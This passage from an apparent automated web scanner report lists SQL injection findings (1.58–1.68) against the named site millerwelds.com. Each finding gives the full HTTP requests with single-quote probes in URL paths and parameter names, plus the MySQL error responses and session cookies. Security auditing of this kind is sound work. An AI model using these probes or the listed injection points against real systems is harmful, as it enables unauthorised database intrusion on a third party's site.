<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?2'' at line 1)<br>
...[SNIP]...

1.58. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-top-bg.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images/footer-top-bg.jpg'?2 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:09 GMT
Connection: Keep-Alive
Content-Length: 27708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?2'' at line 1)<br>
...[SNIP]...

1.59. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/header-background.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images'/header-background.jpg?3 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:11 GMT
Connection: Keep-Alive
Content-Length: 27713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?3'' at line 1)<br>
...[SNIP]...

1.60. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/header-background.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images/header-background.jpg'?3 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:14 GMT
Connection: Keep-Alive
Content-Length: 27712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?3'' at line 1)<br>
...[SNIP]...

1.61. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:28:58 GMT
Connection: Keep-Alive
Content-Length: 27875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arro' at line 1)<br>
...[SNIP]...

Request 2

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:28:59 GMT
Connection: Keep-Alive
Content-Length: 29444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

1.62. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:28:48 GMT
Connection: Keep-Alive
Content-Length: 27800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:28:49 GMT
Connection: Keep-Alive
Content-Length: 29444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

1.63. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif

Issue detail

The REST URL parameter 9 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 9, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif'
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:22 GMT
Connection: Keep-Alive
Content-Length: 27906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/prod' at line 1)<br>
...[SNIP]...

Request 2

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif'
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:23 GMT
Connection: Keep-Alive
Content-Length: 29444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

1.64. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif'
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:07 GMT
Connection: Keep-Alive
Content-Length: 27831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif'
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:09 GMT
Connection: Keep-Alive
Content-Length: 29444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

1.65. http://www.millerwelds.com/pdf/001625sites_QMS.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /pdf/001625sites_QMS.pdf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /pdf'/001625sites_QMS.pdf HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/certifications.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:17 GMT
Connection: Keep-Alive
Content-Length: 27701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.66. http://www.millerwelds.com/pdf/001625sites_QMS.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /pdf/001625sites_QMS.pdf

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /pdf/001625sites_QMS.pdf' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/certifications.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:19 GMT
Connection: Keep-Alive
Content-Length: 27726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/pdf/001625sites_QMS.pdf''' at line 1)<br>
...[SNIP]...

1.67. http://www.millerwelds.com/products/accessories/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /products/accessories/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /products'/accessories/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/results/blog/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.7.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:47 GMT
Connection: Keep-Alive
Content-Length: 27704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.68. http://www.millerwelds.com/products/accessories/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /products/accessories/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /products/accessories'/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/results/blog/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __unam=47bc96c-12f69aae8fb-5600ee4c-1; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.7.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:50 GMT
Connection: Keep-Alive
Content-Length: 27982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

